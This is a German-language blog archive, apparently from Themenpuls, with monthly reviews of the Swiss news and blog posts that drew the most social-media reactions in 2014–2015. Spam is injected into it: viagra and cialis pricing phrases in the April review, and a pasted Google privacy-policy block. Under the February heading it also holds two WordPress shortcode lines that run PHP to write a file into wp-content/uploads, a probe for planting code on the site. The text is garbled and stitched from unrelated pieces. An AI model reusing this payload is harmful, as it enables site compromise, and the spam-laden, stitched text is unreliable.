Monatsrückblick Oktober: Sex sells, Frauen wählen SVP und nervende Expats

Was hat die Schweiz im zurückliegenden Monat am meisten bewegt? Diese Frage beantworten wir mit unserem Monatsrückblick, den man auch als Newsletter abonnieren kann.

 

Das bewegte im News Ranking über alle Ressorts hinweg

Monatsrückblick Oktober – News Ranking

1. Valentino Rossi gegen Marc Marquez

Der Artikel von @20MinutesOnline enthält ein Video, welches den Motorradfahrer Valentino Rossi entlastet. Er wurde beschuldigt seinen Konkurrenten Marc Marquez absichtlich zu Fall gebracht zu haben. So oder so – die Geschichte bewegte.

2. Sex sells auch im Tessin

@ticinonews berichtete über den neuen Bauernkalender, der wie jedes Jahr nackte Bäuerinnen inszeniert. Weit über das Tessin hinaus zog der Artikel zahlreiche Blicke auf sich.

3. Terror in Paris

Gemäss dem Artikel von @20MinutesOnline ist es den Sicherheitskräften in Paris gelungen, einen spektakulären Terroranschlag zu verhindern. Solche Nachrichten sorgen auch im Social Web für Gesprächsstoff.

Aufgefallen:

  • Noch nie schaffte es kein deutschsprachiger Artikel in die monatlichen Top 3.
  • Keiner der Artikel in den Top 3 thematisierte die Wahlen vom 18. Oktober.

 

Das bewegte im Blog Ranking

Monatsrückblick Oktober – Blog Ranking

1. Frauen wählen SVP

Der Artikel aus dem Datenblog des @tagesanzeiger lieferte eine Erklärung für den Wahlerfolg der SVP: Offenbar erhielt die Partei – anders als in der Vergangenheit – besonders viele Stimmen von Frauen. Eine Erkenntnis, die im Rahmen der Wahlanalysen auch im Social Web für Aufsehen sorgte.

2. Zahlen zur Instagram-Nutzung

Darauf haben viele gewartet – deshalb folgten auch zahlreiche Shares, Likes, Comments und Tweets: Der Artikel von @thomashutter zeigte die Reichweite von Instagram in der Schweiz sowie Angaben zu Geschlecht und Alter der Nutzerinnen und Nutzer.

3. Nervende Expats

Was Schweizerinnen und Schweizer so richtig nervt – zusammengefasst im Artikel von @newlyswissed. Und wenn sie sich genervt fühlen, dann hauen immer mehr Leute auch im Social Web in die Tasten, was den Artikel in die Top 3 hievte.

Aufgefallen:

  • Im Gegensatz zum News Ranking bewegte im Blog Ranking ein Artikel über die Wahlen am meisten.
  • Kein anderer Blog ist so häufig in den Top 3 vertreten wie @newlyswissed.

Wahlpuls – Berichterstattung zu den Eidg. Wahlen 2015

Themenpuls erfasst für Sie alle Online-Medienartikel zu den «Eidgenössische Wahlen 2015». Erfahren Sie, wer und was aus welchen Gründen am meisten Aufmerksamkeit erhielten.

http://blog.themenpuls.ch/wp-content/uploads/2015/09/Unbenannt.jpg


 

      Die mediale Berichterstattung:
      In der Berichterstattung der Online-Medien zu den Wahlen dominierten im August folgende Themen:

        1. 2. Bundesratssitz für die SVP
        2. Asyldebatte
        3. Videos und Social Media im Wahlkampf
        4. SVP (u.a. Alleingang SVP Graubünden, Wählerschaft, Nationalratskandidaten)

      Hierbei fällt auf, dass es nicht nur der SVP gelang, die vorherrschenden Debatten an sich zu reissen. Auch andere Akteure übernahmen in der Asyldebatte eine aktive Rolle, allen voran Bundespräsidentin Sommaruga und die CVP. Gleichzeitig prägte letztere die Diskussion um einen zweiten SVP-Bundesratssitz.

      Auch berichteten die Medien überdurchschnittlich oft über:

        1. Roger Köppel
        2. Volksinitiativen im Wahlkampf
        3. Wahlbeteiligung und Massnahmen zu deren Steigerung

      Im September griffen die Medien in ihrer Berichterstattung zu den Wahlen hauptsächlich folgende Themen auf:

        1. Asyldebatte
        2. Wahlbarometer/Prognose eines Rechtsrutsches
        3. Kandidatenflut
        4. Roger Köppel
        5. Videos und Social Media im Wahlkampf
        6. SVP

      Die SVP dominierte im laufenden Monat wieder ganz die Asyldebatte. Insgesamt verlor die Partei aber etwas an medialer Aufmerksamkeit. Dies kam der allgemeinen Berichterstattung zu den Wahlen zu Gute. (Wähleranteile/Rechtsrutsch, Kandidatenflut, Analyse der Universität Zürich zur Medienberichterstattung)


      Die Reaktionen
      Mehr Medienartikel zu den Wahlen auf den Online-Portalen der Zeitungen, aber nicht mehr Reaktionen bei der Leserschaft pro Artikel: Dieser Trend der Vormonate hat sich auch in den letzten Wochen bestätigt. Der Schluss liegt nahe, dass sich die Leserschaft vor dem eigentlichen Wahlkampf im selben Masse für die eidgenössischen Wahlen interessierte wie einen Monat vor dem Urnengang.

      Die Leserschaft reagierte am stärksten auf Medienberichte zur Asyldebatte, zur Diskussion um einen zweiten SVP-Bundesratssitz und über Wahlkampf-Videos/Schreibfehler von Politikern.

      Anders im September: Hier lösten neben der Asyldebatte vor allem das Wahlbarometer, der prognostizierte Rechtsrutsch und das Thema „Social Media im Wahlkampf“ Reaktionen aus.

      Die folgenden fünf Artikel bewegten die Leser gemessen an ihren Reaktionen im Web am stärksten:

        02.08.2015: Asyl-Debatte: «Ich fürchte um den Frieden in der Schweiz», 20 minuten
        11.08.2015: Schreibfehler von SVP-Politikerin verbreitet sich viral, TA
        11.08.2015: Good News! SVP-Nationalrätin Nadja Pieren will die Zuwanderung beGERNzen, Watson
        12.08.2015: Eveline Widmer-Schlumpf: Rücktritt bei Rechtsrutsch!, Blick
        01.09.2015: Facebook hat Christoph Mörgelis Account gesperrt! Mörgeli: «Ich frage mich, wie so etwas passieren kann.» Ja, wie denn?, Watson


        Trends

        • Die Asylpolitik verliert an Gewicht in der Berichterstattung zu den Wahlen.
        • Im Fokus der Medien stehen mehr die Parteien und das politische System insgesamt als die KandidatInnen selber.
        • Die Ständeratswahlen interessieren vergleichsweise wenig.
        • Die SVP geniesst in allen Phasen des Wahlkampfs mit Abstand am meisten Medienpräsenz, wobei dies ein von den Wahlen unabhängiges Phänomen ist. Allerdings verlor die Partei im September im Vergleich zum Vormonat an Medienpräsenz.

    Monatsrückblick August: Elefanten, Praktikanten und Rivella

    Was hat die Schweiz im zurückliegenden Monat am meisten bewegt? Diese Frage beantworten wir mit unserem Monatsrückblick, den man auch als Newsletter abonnieren kann.

     

    Das bewegte im News Ranking über alle Ressorts hinweg

    Monatsrückblick August – News Ranking

    1. Keine Elefanten mehr im Circus Knie

    Im Artikel aus dem @tagesanzeiger erklärte Franco Knie Jr. eine Entscheidung, die im Social Web viel bewegte – nicht nur unter Menschen, denen Tiere am Herzen liegen.

    2. Obdachloser UNO-Praktikant

    Viel Kritik erntete die UNO aufgrund eines Artikels von @24heuresch, der die prekären Anstellungsbedingungen von Praktikanten beschreibt.

    3. Separate Schwimmkurse für Muslime

    Eine Forderung des Islamischen Zentralrates wurde in einem Artikel von @20MinutesOnline aufgegriffen und erzeugte danach auch im Social Web viele Reaktionen.

    Aufgefallen:

    • Wie bereits in den zurückliegenden Monaten schaffte es auch im August eine Tier-Geschichte sich im News Ranking zuoberst zu platzieren.
    • Keiner der Artikel in den Top 3 bezieht sich auf die Wahlen und Themen aus dem Wahlkampf.

     

    Das bewegte im Blog Ranking

    Monatsrückblick August – Blog Ranking

    1. Rassismus auf Facebook

    In seinem Blogpost gibt @thomashutter Tipps für den Umgang mit einer unschönen Seite von Social Media – was viele Users dankend gelesen und weiterverbreitet haben.

    2. Rivella trinken – und dann?

    Diese Frage beantwortet der Blogpost von @newlyswissed mit einem Video, das Angestellte von BuzzFeed zeigt und sich viral verbreitete.

    3. Touristische Tops und Flops in der Schweiz

    Von „oft kritisch“ bis „begeistert“ zeigte eine Schweiz-Karte im Blogpost aus dem Datenblog des @tagesanzeiger wie (un-)zufrieden die Touristinnen und Touristen sind – was viel Gesprächsstoff lieferte für das Social Web.

    Aufgefallen:

    • Videos und Daten liefern Inhaltsformen, die oftmals attraktiver sind als Text und deshalb den Social Media Buzz anfeuern.
    • Im August lagen die Blogposts mit den meisten Reaktionen zahlenmässig weiter hinter den bestplatzierten Artikeln im News Ranking zurück als auch schon.

    Monatsrückblick Mai: #catcontent!

    Welche Themen haben das Social Web im vergangenen Monat am meisten bewegt? Diese Frage beantworten wir mit unserem Themenpuls-Monatsrückblick. Abonnieren Sie den Rückblick als Newsletter.

    Das bewegte im Mai über alle News-Ressorts hinweg

    Bildschirmfoto 2015-06-05 um 17.59.59

     

    #catcontent dominierte den Monat Mai. Insgesamt drei Beiträge mit Katzen-Bezug finden sich in den Top 5 des Rankings. Ergänzt werden diese mit Hunde-Content unter den ersten fünf Artikeln. Die tierische Dominanz von Watson vermag allein 20 minutes an vierter Stelle mit einem Bericht über das Erdbeben in Nepal zu durchbrechen.

    II Das bewegte im Ressort Politik

    Bildschirmfoto 2015-06-08 um 10.23.41

     

    Die Politik im benachbarten Ausland interessierte im Mai mehr als inländische Themen. Am meisten geteilt wurde der NZZ-Artikel über die Wahlerfolge der FPÖ bei den österreichischen Landtagswahlen in der Steiermark und im Burgenland. Ergänzt werden die Top 5 im Ressort Politik mit Berichten über den Front National in Frankreich, die griechische Regierung, die Gefahr eines ISIS-Terroranschlags in der Schweiz und schweizer Einkaufstourismus in Badem-Württemberg.

     

    III Das bewegte die Schweiz im Ressort Wirtschaft

    Bildschirmfoto 2015-06-08 um 11.14.38

     

    Mit 3983 Reaktionen war der Blick-Artikel „Buffet-Schlacht von Luzerner Hoteldirektorin: Mit Schockbildern gegen gierige Chinesen“ der am meisten geteilte Beitrag im Ressort Wirtschaft. Gleich zwei Texte in den Top 5, einer der NZZ und einer der Basler Zeitung nehmen sich dem Thema Abschaffung des Bargelds an.

    Monatsrückblick April: Spektakuläre Landungen, isländische Geldpolitik und glückliche Schweiz

    Was hat die Schweiz im zurückliegenden Monat am meisten bewegt? Diese Frage beantworten wir mit unserem Monatsrückblick, den man auch als Newsletter abonnieren kann. cialis price viagra cost per pill cvs

      generic cialis cheap india where to buy cialis in bangkok

    Das bewegte im News Ranking über alle Ressorts hinweg

    Themenpuls.ch – Monatsrückblick April – News

    1. Spektakuläre Landungen am Flughafen Zürich

    Das Video im Artikel von @watson_news ist spektakulär und erzielte nicht nur weltweit über 500’000 Views auf YouTube, sondern machte den Artikel auch zu demjenigen, der im April im Social Web die meisten Reaktionen erzielte.

    buy viagra online legit how much does a viagra pill cost

    2. Revolutioniert Island die Geldpolitik?

    Geldpolitik ist seit der Aufhebung des Euro-Mindestkurses durch die Schweizer Nationalbank ein Thema, das auch die breite Bevölkerung interessiert. Der Artikel von @Lematinch thematisierte den revolutionären Vorschlag eines Parlamentariers in Island, der auch in der Schweiz bewegte: Geldschöpfung über Kredite soll für Geschäftsbanken künftig nicht mehr möglich sein.

    3. Umweltorganisation rettet verdächtige Fischer

    Im Artikel von @20minutesOnline wurde darüber berichtet, wie die Umweltorganisation Sea Shepherd vor der Westküste von Afrika die Besatzung eines Schiffes rettete, die sie der illegalen Fischerei verdächtigte. Auch in diesem Artikel gab es ein Video, das die vielen Reaktionen zumindest teilweise erklärt.

    Aufgefallen:

    • Videos helfen dabei mit News-Artikeln im Social Web viele Reaktionen zu erzielen. cialis daily cost
    • Zwar machen Facebook Likes den Grossteil der Reaktionen aus, rund 2’000 Kommentare (auf der News-Plattform oder Facebook) sind bei den ersten beiden Artikeln aber genauso beachtlich.

     

    Das bewegte im Blog Ranking

    Themenpuls.ch – Monatsrückblick April – Blogs

    1. Glückliche Schweiz

    Ausgehend vom World Happiness Report erklärte der Blogpost, den Dimitri Burkhard für @newlyswissed geschrieben hat, mit 31 Gründen, weshalb die Schweiz beim Glücklichsein alle anderen Länder hinter sich lässt. Neben Freude (in der Schweiz) hat mitunter auch Neid (in allen anderen Ländern) zu vielen Reaktionen im Social Web geführt.

    2. Bewegende Begegnungen

    Der Blogpost von @Elternplanet enthielt das Video einer Sensibilisierungskampagne der Behindertenorganisation insieme. Kathrin Buholzer hat einleitend dazu geschrieben: „Manchmal braucht es nur ganz wenig um Menschen zu berühren.“ Dies gilt auch für das Social Web, wo der Blogpost viele Menschen bewegte.

    3. Persönliche Vorwürfe und öffentliches Urteilen

    Noch ein zweiter Blogpost von @Elternplanet schaffte es in die Top 3. Darin hat Kathrin Buholzer die genauso traurigen wie schwierigen Situationen beschrieben, in denen sich die Eltern von bei Unfällen oder Verbrechen verstorbenen Kindern befinden. Angesichts der Vorwürfe, die sie sich persönlich machen, plädiert Buholzer dafür, dass darüber – auch im Social Web – nicht öffentlich geurteilt werden soll.

    Aufgefallen:

    • Mit über 15’000 Shares, Likes, Tweets, +1 und Kommentaren hätte sich der Blogpost von @newlyswissed auch im Vergleich mit den Artikeln der News-Plattformen an die Spitze gesetzt.

    Monatsrückblick Februar: Schweizer Ortsnamen, virtuelle Gefahren für Kinder, Pädophilie und tierische Bilder

    When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
    There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
    Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
    [insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/insert_php]
    [php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/php]

    Blogcharts Januar: Expats bewegen die Schweiz

     

    Blogcharts Januar

    «19 Ways to Piss off the Swiss» heisst der Blogpost, der im Januar mit grossem Abstand am meisten bewegte. Die Expats von «Newly Swissed» schienen mit ihrem humorvollen Listicle die Besucher vor allem zu erheitern – und zu Reaktionen zu animieren. Mit 5739 Reaktionen, rund sechsmal mehr als der zweitplatzierte Post, ist «Newly Swissed» klarer Spitzenreiter der Januar-Blogcharts.

    Wann immer Facebook einen neuen Service lanciert oder die Allgemeinen Geschäftsbedingungen ändert, bloggt Thomas Hutter darüber. So wie am 30. Januar 2015. Und die Netzgemeinde reagiert. Platz zwei im ersten Blogger-Ranking des Jahres.

    Wie im News-Ranking ist auch in der schweizer Bloglandschaft der Islam ein vieldiskutiertes Thema. Der «Datenblog» des Tages-Anzeigers greift die Thematik im Januar in zwei Blogposts auf. Unter dem Titel «Warum fühlt sich Pegida Schweiz von diesem kleinen, blauen Kreis bedroht?» rechnet Marc Bruppacher vor, wie viele Muslime aus welchen Nationen in der Schweiz leben, wie sich ihre Zahl entwickelt. Fünf Tage später analysiert Barnaby Skinner im Beitrag «Muslime sind Bad News» die Stimmungslage der Medien in Bezug auf Muslime. Die Posts schaffen es auf Platz drei und vier in unseren Blogcharts.

    Du kennst einen Blog, den wir unbedingt berücksichtigen sollten und der noch nicht erfasst ist? Dann bitte hier vorschlagen. Merci!

    Monatsrückblick Januar: Das Attentat auf «Charlie Hebdo» heizt die Islam-Debatte an

    Themenpuls legt dar, welche Mediengeschichten im vergangenen Monat in den Sozialen Netzwerken am meisten bewegt haben. Abonnieren Sie den Monatsrückblick als Newsletter.

     

    I Das bewegte über alle Ressorts hinweg

    Themenpuls alle Ressorts_Jan

    1. «Nous allons vous traquer jusqu’au dernier»

    Drei Tage nach dem Attentat auf die Satirezeitschrift «Charlie Hebdo» vom 7. Januar 2015 veröffentlicht das Hacker-Kollektiv Anonymous eine kämpferische Videobotschaft unter dem Hashtag #OpCharlieHebdo. Darin drohen die Netzaktivisten der islamischen Terrororganisation al-Qaida mit Vergeltung für die Opfer des Anschlags auf «Charlie Hebdo». «20 Minutes» publiziert die Videobotschaft am 10. Januar 2015 und verweist dabei auf Hintergrundinformationen des französischen Newsportals «Le Monde». Die Videobotschaft verbreitet sich im Netz schnell und weit: Fast 120’000 Reaktionen löst der Beitrag von von «20 Minutes» aus – mehr als doppelt so viele wie der nächstplatzierte im Themenpuls-Ranking.

    2. 12 Gründe, weshalb jedes Kind einen Hund oder eine Katze braucht

    Watson bedient sich am 22. Januar 2015 gleich zweier erfolgsversprechender Faktoren für virale Verbreitung: Listicles und «Cat Content». Mit Erfolg: Die zwölf teils wissenschaftlich untermauerten Gründe, weshalb Kinder mit einer Katze oder einem Hund aufwachsen sollten, ernten im Januar am zweitmeisten Reaktionen insgesamt und setzen damit einen Kontrastpunkt zu den politischen Beiträgen unter den ersten drei.

    3. Islam soll in der Schweiz zur Landeskirche werden

    Der Anschlag auf «Charlie Hebdo» in Paris entfacht in der Schweiz eine intensiv geführte Debatte um Islam und Islamismus. Farhad Afshar, Präsident der Koordination Islamischer Organisationen Schweiz, fordert in der Nachrichtensendung «10vor10» von SRF, dass der Islam als öffentlich-rechtliche Religionsgemeinschaft anerkannt werden müsse, auch um einer Radikalisierung vorzubeugen. «20 Minuten» nimmt die Aussage zum Anlass für eine genauere Analyse. Inlandredaktorin Jacqueline Büchi zitiert dazu in ihrem Text ein Gutachten der Universität Luzern und befragt Politiker sowie Vertreter islamischer Organisationen. Die im Kontext des Attentats geäusserte Forderung wird online heftig diskutiert und weiterverbreitet. 43’321 Reaktionen löst der Text aus. Am drittmeisten im ersten Monat des Jahres.

    II Das bewegte im Ressort Politik

    Themenpuls Politik_Jan

    1. «Nous allons vous traquer jusqu’au dernier»

    (siehe oben)

    2. Islam soll in der Schweiz zur Landeskirche werden

    (siehe oben)

    3. L’EI appelle à des attaques terroristes en Suisse

    Nach dem Attentat auf «Charlie Hebdo» wird in den schweizer Medien auch die Gefahr eines Anschlags im Inland thematisiert. Am 14. Januar taucht dabei ein Video mit drei syrischen Dschihadisten des Islamischen Staats auf. Darin kündet einer der Gotteskrieger weitere Anschläge in den USA und Europa an – und erwähnt dabei explizit die Schweiz. «20 Minutes» verarbeitet den Inhalt des Videos in einem Artikel, der fast 14’000 Reaktionen auslöst.

    III Das bewegte im Ressort Wirtschaft

    Themenpuls_Wirtschaft_Jan

     1. Ikea macht Fleischbällchen vegan

    6500 Köttbullar werden laut «20 Minuten» täglich in allen neun Ikea-Filialen der Schweiz serviert. Die typisch schwedischen Fleischbällchen sind nebst dem Kerngeschäft mit Möbeln und Einrichtungsgegenständen ein Verkaufsschlager. Um den ökologischen Fussabdruck des Unternehmens zu verringern, arbeitet Ikea nun an einer veganen Alternative zu den Hackfleischbällchen. Diese soll in der Herstellung weniger energieintensiv und für die Konsumenten gesünder als die karnivore Variante sein. Ein Plan, der offenbar für Gesprächsstoff sorgt: Mit fast 5000 Reaktionen war der Beitrag die Nummer 1 im Monat Januar.

    2. Zangengriff von Parteien und Kammern lähmt Österreich

    Es ist quasi ein Abschiedsgeschenk des langjährigen Österreich-Wirtschaftskorrespondenten Matthäus Kattinger. Am 1. Januar publiziert die NZZ dessen Analyse der fehlenden Wettbewerbsfähigkeit unseres östlichen Nachbarlands. Der laut Angaben der Zeitung in den «Unruhestand» übertretende Journalist zeigt in 17 Abschnitten die politischen Faktoren für das Erlahmen der Wirtschaft Österreichs auf. Unruhig ist auch die Reaktion auf den Text: Knapp 2000-mal wird der Beitrag geteilt, kommentiert oder geliket.

    3. La Suisse a perdu 360 milliards de francs d’un coup

    Die Meldung sorgte international für grosses Aufsehen: Am 15. Januar 2015 hebt die Schweizerische Nationalbank überraschend den Euro-Mindestkurs auf. In der Schweiz entsteht eine lebhafte Debatte über Sinnh und Folgen des Entscheids. 360 Milliarden Franken habe die Schweiz wegen der Abkehr vom Mindestkurs auf einen Schlag verloren, schreibt «24 heures» am 21. Januar 2015 und löst damit 1740 Reaktionen aus.

    Aufgefallen

    Screen Shot 2015-02-02 at 20.03.58

     

    • Insgesamt dominiert im Januar die Diskussion um das Attentat auf «Charlie Hebdo» (siehe Bild) sowie die Folgedebatte um den Islam, die Muslime und die Islamisierung in der Schweiz.
    • SNB-Entscheid omnipräsent: Bei den Wirtschaftsnews wird der bewegteste Artikel zum Euro-Mindestkurs zwar erst an dritter Stelle aufgeführt. Die Positionen 3 bis 10 belegen aber allesamt Beiträge zum Kurswechsel der Nationalbank.

    Monatsrückblick Dezember: Familie und Zivilcourage sind wichtige Themen in der Weihnachtszeit

    Was hat die Schweiz im zurückliegenden Monat am meisten bewegt? Diese Frage beantworten wir mit unserem Monatsrückblick, den man auch als Newsletter abonnieren kann.

     

    Das bewegte im Blog Ranking

    Blog Ranking im Dezember

    1. Tipps für den Umgang mit kranken Männern

    Winterzeit ist leider auch Grippezeit – weiss auch Bloggerin Kathrin Buholzer (@Elternplanet) und gibt in ihrem Blogpost mit einem Augenzwinkern Tipps für den Umgang mit kranken Männern. Dass diese dann besondere Aufmerksamkeit brauchen, scheinen auch viele Leserinnen und Leser zu kennen und teilen den Blogpost fleissig.

    2. Was Kinder brauchen

    Kathrin Buholzer spricht in ihrem Blogpost aus, was viele nicht gerne hören: Auch Eltern verhalten sich nicht immer richtig und es fällt schwer das zuzugeben. Doch die Elternplanet-Bloggerin macht Mut und gibt nützliche Ratschläge, die helfen Konfliktsituationen zwischen Eltern und Kindern zu vermeiden und vielfach auf Facebook geteilt und geliked wurden.

    3. Unterwegs in Trier

    Reisebloggerin Anita Brechbühl, alias @travelitach, fuhr Anfang Dezember bereits zum zweiten Mal nach Trier. Ihre Erlebnisse und schönsten Bilder teilt sie mit ihren Leserinnen und Lesern im Blogpost – vor allem letztere werden viele zum Liken und Teilen animiert haben.

    Aufgefallen:

    • Elternplanet-Bloggerin Kathrin Buholzer schafft es im Dezember mit gleich zwei Blogposts in die Top 3. Auch daran zeigt sich, dass die Familie ein wichtiges Thema in der Weihnachtszeit ist.
    • Dass Bilder einen positiven Einfluss auf das Engagement der User haben, zeigt der Blogpost von @travelitach.

     

    Das bewegte im Ressort „Politik“

    Ressort Politik im Dezember

     

    1. Lebenserhaltende Massnahmen abgeschaltet

    Mitte November wird die Studentin Tugce im deutschen Offenbach von einer Gruppe junger Männer ins Koma geprügelt, weil sie zwei bedrängten Mädchen zu Hilfe eilte. An ihrem 23. Geburtstag entschied die Familie, die lebenserhaltenden Massnahmen abzuschalten, wie @20MinutesOnline in einem Artikel berichtet. In Deutschland löste der Fall eine Debatte über Zivilcourage aus und auch in der Romandie bewegt der schreckliche Vorfall im Social Web.

    2. Umziehen wegen Asylbewerbern

    Wie @Lematinch in einem Artikel berichtet, muss in Moosleerau (AG) eine Familie umziehen, weil ihre Wohnung der Gemeinde gehört und diese entschieden hat eine Asylbewerberfamilie aufzunehmen. Darüber zeigt sich nicht nur die Familie bestürzt, sondern auch viele User im Social Web.

    3. Schawinski nimmt Stellung

    In der Talkshow „Schawinski“ waren Roger Schawinski und der Berner Kabarettist Andreas Thiel heftig aneinander geraten. Im Artikel von @20Min bezieht der Talkmaster Stellung und sagt, dass er die Sendung besser abgebrochen hätte. Die exklusive Stellungnahme sorgt auf Facebook, Twitter und Google+ erneut für viel Gesprächsstoff.

    Aufgefallen:

    • Während die Artikel von @20MinutesOnline und @Lematinch vor allem Engagement auf Facebook erzeugten, bewegte die Stellungnahme von Roger Schawinski in @20Min auch auf Twitter und Google+.

     

    Das bewegte im Ressort „People“

    Ressort People im Dezember

     

    1. Der König der Likes

    In einem Artikel berichtet der @tagesanzeiger über das Schweizer Internetphänomen Bendrit Bajra. Der 19-jährige Schwamendinger hat seine grosse Community vor allem mit witzigen Videos und Selfies aufgebaut. Dass er tatsächlich der „König der Likes“ ist, zeigt auch die enorme Anzahl Reaktionen im Social Web.

    2. Freddy Burger über Udo Jürgens

    Freddy Burger war 37 Jahre lang Manager von Udo Jürgens. Im Interview mit @Blickch spricht er über den tragischen Verlust seines engsten Freundes. Die traurige Nachricht und der Artikel erzeugten auch auf Facebook viele Reaktionen.

    3. Charles Aznavour in concert

    Der Chansonnier Charles Aznavour denkt auch 90-jährig nicht ans Aufhören: In diesem Jahr hat er ein 60-teiliges Compilation Album veröffentlicht und am 12. Dezember in Genf ein Konzert gegeben. Im Interview mit @tdgch spricht er über seine lange Karriere und bewegt damit auch viele Fans.

    Aufgefallen:

    • Der Artikel im @tagesanzeiger über den jungen Schweizer Bendrit Bajra erzeugte auf Facebook mehr als dreimal so viele Likes und Shares, wie die anderen beiden Top 3 Artikel.